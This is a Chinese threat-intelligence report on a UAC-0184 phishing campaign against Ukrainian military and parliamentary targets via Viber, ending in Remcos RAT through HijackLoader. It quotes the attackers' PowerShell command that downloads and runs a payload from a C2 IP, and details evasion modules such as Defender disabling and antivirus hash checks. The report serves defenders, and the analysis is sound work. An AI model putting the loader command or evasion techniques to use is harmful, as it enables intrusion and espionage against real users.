文章总结： UAC-0184组织针对乌克兰军方利用Viber投放伪装成阵亡档案的恶意LNK文件，通过DLL侧加载、ModuleStomping及HijackLoader技术规避检测，最终植入RemcosRAT窃取情报。报告建议相关机构加强数据加密与访问控制，警惕利用即时通讯软件的钓鱼攻击。 综合评分： 92 文章分类： 威胁情报,恶意软件,逆向分析,社会工程学,免杀

UAC-0184 | “阵亡档案黑幕”钓鱼行动

原创

高级威胁研究院

360威胁情报中心

2025年12月26日 17:30 北京

UAC-0184（也被追踪为Hive0156）是一个与俄罗斯结盟的威胁行为者，主要使用商用恶意软件和诱饵文档在乌克兰策划恶意网络攻击活动。通过投放恶意LNK文件或PowerShell脚本攻击乌克兰军事人员，导致Remcos感染。该组织使用的诱饵文档主题与关注乌克兰军方作战态势的人员高度相关。

一、概述

360高级威胁研究院近期监测数据显示，UAC-0184组织针对乌克兰最高拉达发起网络钓鱼攻击活动，内容涉及乌克兰军人档案被篡改及拒付阵亡赔偿等敏感议题。该组织在2025年持续针对乌克兰军事和政府部门开展高密度情报窃取活动，本报告据此展开专项分析，建议相关机构及人员强化安全防护意识，加强涉密情报与用户数据的加密保护及访问控制，有效防范恶意攻击导致的信息泄露风险。

二、攻击链分析

本次攻击活动利用即时通讯软件Viber作为初始入侵渠道，通过社会工程学诱饵分发恶意压缩包。攻击链具有高度的复杂性，结合了DLL侧加载（DLL Side-Loading）、非标准控制流转移以及双重模块踩踏（Module Stomping）技术，旨在规避安全检测并最终植入HijackLoader以加载Remcos RAT。

2.1. 初始访问与投递

攻击者通过Viber向目标用户发送名为А2393.zip的恶意归档文件。解压后，该压缩包包含多个伪装成合法文档的LNK快捷方式文件文件名，诱导性强，意图通过社会工程学手段诱使用户点击。

诱饵文档如下：

Zapit_iz_verhovnoi_radi.docx【来自最高拉达（乌克兰议会）的质询】

Scan_zapitu_iz_verhovnoi_radi.rtf【最高拉达质询函扫描件，内容为关于审议已故乌克兰卫士亲属集体申诉事宜】

Dodatok_do_zapitu.xlsx【质询函附件，内容为2023年1月1日至2025年1月31日期间人员总损失名单】

2.2. 下载与执行

UAC-0184交替利用恶意LNK文件与PowerShell脚本作为第一阶段的初始入侵载体[1]。尽管这两种方式均旨在向受害者展示诱饵文档的同时，于后台隐蔽执行HijackLoader感染链，但其诱饵投递机制存在显著差异：

基于LNK的攻击：需发起两次独立的C2请求，分别用于获取诱饵文件和包含恶意加载器的ZIP压缩包。

基于PowerShell的攻击：仅发起一次网络请求，下载的ZIP压缩包中已内嵌了诱饵文档。

在本次捕获的LNK攻击样本中，LNK文件执行后首先发起请求下载并运行PowerShell脚本。

随后，该脚本从远程C2服务器拉取并解压第二阶段载荷 smoothieks.zip，启动合法宿主进程CFlux.exe加载恶意模块，并同步打开诱饵文档以降低受害者警觉。

| | | — | | echo rKtGxKJUaoCCtexNyfdt; if (-not[IO.File]::Exists((‘smoothieks’+’.’+’zip’))){&(Get-Command i**************************o*********************************e-We*) -uri ht”tp”://5.101.8”5.24/smoothieks.zip -OutFile smoothieks.zip};if (-not[IO.File]::Exists((‘MSWinDistro/’+’CFlux’+’.’+’exe’)) -and -not [IO.File]::Exists((‘MSWinDistro/’+’Dodatok_do_zapitu’+’.xlsx’))){Expand-Archive smoothieks.zip -DestinationPath MSWinDistro};start ‘MSWinDistro/CFlux.exe’;start ‘MSWinDistro/Dodatok_do_zapitu.xlsx |

smoothieks.zip压缩包内的文件：

2.3. DLL侧加载与流劫持

CFlux.exe启动后，通过DLL侧加载（DLL Side-Loading）技术加载了位于同目录下的恶意动态链接库CDWizard.dll。该恶意DLL修改了原始函数逻辑，以便在运行时动态加载SQLite.Interop.dll。

值得注意的是，恶意代码摒弃了通过导出表解析函数的常规API调用方式，转而直接跳转至SQLite.Interop.dll内部的硬编码偏移地址0xF3735处执行后续指令。

这种非标准的控制流转移技术有效地混淆了执行路径，显著增加了静态分析与检测的难度。

攻击者将API解析逻辑封装在sqlite3_log函数内部，将其伪装成看似无害的合法日志记录操作。

2.4. 解密与第一次注入

载荷执行阶段，恶意代码首先解密Hekgiegsteal.lt文件中的加密数据提取出Shellcode（ADD算法）。

紧接着，攻击者实施Module Stomping：加载合法的evr.dll模块，并直接将其可执行代码段（.text）替换为恶意Shellcode，同时传入Jabveak.qafy作为后续阶段载荷参数。

这种手段使恶意代码运行在合法模块的内存空间内，利用系统文件的合法路径掩盖其真实属性，极大地增加了内存扫描工具的检测难度。

2.5. 载荷组装与第二次注入

驻留在evr.dll中的恶意Shellcode读取并解密数据文件Jabveak.qafy,利用内置的PNG格式解析逻辑，在数据流中遍历并定位符合特定特征签名的IDAT数据块。

为了还原载荷，Shellcode申请一段具有PAGE_EXECUTE_READWRITE(RWX)属性的内存空间，将分散在各个IDAT块中的数据片段提取出来并进行重组。数据拼接完成后，代码利用嵌入在数据头部的密钥执行XOR解密算法，在内存中还原出完整的攻击载荷。

解密后的数据不仅包含HijackLoader，还包含关键的配置信息，指定了下一阶段的注入策略，包括目标文件路径、宿主文件名、以及各个功能模块的名称与运行参数。依据此配置，恶意代码再次实施 Module Stomping 攻击，将提取出的载荷覆写到合法系统模块rasapi32.dll的内存空间中。

2.6. HijackLoader

HijackLoader[2]功能模块

| | | | — | — | | 模块名称 | 模块功能 | | AVDATA | 反病毒软件进程名称黑名单 | | ESAL/ESAL64 | 执行最后的Payload | | ESLDR/ESLDR64 | 辅助注入HijackLoader相关的 shellcode | | ESWR/ESWR64 | 清除shellcode，并执行rshell模块 | | FIXED | 用于进程注入的合法可执行文件 | | LauncherLdr64 | 解密HijackLoader PNG文件提取模块 | | modCreateProcess/modCreateProcess64 | 创建子进程 | | modTask/modTask64 | 创建计划任务 | | modUAC/modUAC64 | UAC提取模块 | | modWD/modWD64 | 禁用Defender | | modWriteFile/modWriteFile64 | 文件写入模块 | | rshell/rshell64 | 重定位、解析并执行最终有效载荷 | | ti/ti64 | 执行第一阶段后代码注入 | | TinycallProxy/TinycallProxy64 | 间接进行函数调用，对抗栈回溯 | | tinystub/tinystub64 | 辅助注入rshell以规避检测 | | tinyutilitymodule/tinyutilitymodule64 | 用空字节覆盖指定文件的PE Header | | SM | 指定TinycallProxy在对抗栈回溯时用于伪装调用地址的DLL | | COPYLIST | 文件配置清单 | | CUSTOMINJECT | 投递最终载荷时被注入的程序 | | CUSTOMINJECTPATH | 存放CUSTOMINJECT的路径 | | X64L | 架构转换 | | PERSDATA | 持久化配置 |

HijackLoader的AVDATA模块通过计算进程名的CRC32哈希值进行环境侦察，以识别并规避主流安全软件。

| | | | | — | — | — | | CRC32 | PRODUCT NAME | PROCESS NAME | | 0x40CB21D3 | Kaspersky AntiVirus | avp.exe | | 0xB02EF94 | Avast Antivirus | avastsvc.exe | | 0x27873423 | / | / | | 0x19E8FAD2 | BitDefender Antivirus | bdagent.exe | | 0x8E9E8ADD | AVG Internet Security | avgsvc.exe | | 0xD5345E50 | Emsisoft Anti-Malware | a2service.exe | | 0x456B109F | Webroot SecureAnywhere | wrsa.exe | | 0xF868B2F1 | Windows Defender | mspeng.exe |

TinycallProxy模块利用“调用栈伪造”技术，在执行敏感操作时，修改内存栈帧，将函数调用伪装成CDWizard.dll的地址。从而欺骗安全软件的栈回溯检查，使恶意行为看起来像是该DLL的正常业务逻辑流。

利用Windows计划任务实现持久化。

HijackLoader使用环境变量在不同加载阶段之间传递关键配置信息。为了规避静态特征检测，环境变量的名称并非硬编码，而是基于受害主机的NetBIOS计算机名动态生成。使得每一次感染生成的变量名都具有唯一性，增加检测难度。

2.7. Remcos

HijackLoader最终将Payload注入到合法程序Chime.exe中，以隐蔽执行核心远控木马Remcos RAT。Remcos是一款经常被滥用的合法远程管理工具，具备远程管理、载荷执行、屏幕监控、持久化和信息窃取等多种功能。尽管该工具在市场上被标榜为合法的系统管理软件，但因其强大的侵入性功能，常被各类恶意攻击者滥用于网络间谍和数据窃取活动。运行后的Remcos Implant会主动连接攻击者的C2服务器以接收指令。攻击者通过Remcos提供的图形用户界面(GUI)控制面板，能够对受害主机进行批量自动化管理，或进行精准的手动交互操作。

三、归属研判

1.  本次攻击使用的诱饵文件名（如 Zapit_iz_verhovnoi_radi，即“来自最高拉达的质询”）明确指向乌克兰最高立法机构的调查程序。文件内容涉及“军人档案篡改”与“抚恤金拒付申诉”等敏感议题，这与UAC-0184长期以来针对乌克兰政府决策层、军事行政体系及军人个体实施情报窃取的战略动机完全吻合。

2.  攻击利用Viber分发恶意压缩包，延续了该组织利用即时通讯软件扩展攻击面的标志性策略。UAC-0184向来擅长利用Signal、Telegram及约会软件构建信任关系；Viber作为乌克兰极其普及的通讯工具，是其扩展攻击面的典型选择。此外，利用伪装成“军事调查”或“法律请求”文档的LNK文件进行投递，精准复刻了该组织既往行动的惯用手法。

3. 攻击链最终载荷为Remcos RAT，并由HijackLoader负责释放与加载，这一工具组合是UAC-0184的关键技术特征。

综上结合受害者定位、社会工程学手段及专用工具集特征，有高置信度将本次攻击活动归因为UAC-0184组织。

附录 IOC

MD5

77da028b852acdcdcf4b46b23e79ac66

f7a93c7918a4d8837519eb6619c25b90

739dea9edc813c83cc488010cbdc10f6

1ce195f66d79587d583e4792ceb1c898

C2&URL

5.101.85.24

http[:]//5.101.85.24/k4s/tune.ps1

http[:]//5.101.85.24/k4s/spear.ps1

http[:]//5.101.85.24/smoothieks.zip

参考

[1]https://www.ibm.com/think/x-force/hive0156-continues-remcos-campaigns-against-ukraine

[2]https://medium.com/@baglai.vlad/hijackloader-ghostpulse-idat-loader-comprehensive-analysis-6e15f48eb96d

团队介绍

TEAM INTRODUCTION

360高级威胁研究院

360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：360威胁情报中心 高级威胁研究院《UAC-0184 | “阵亡档案黑幕”钓鱼行动》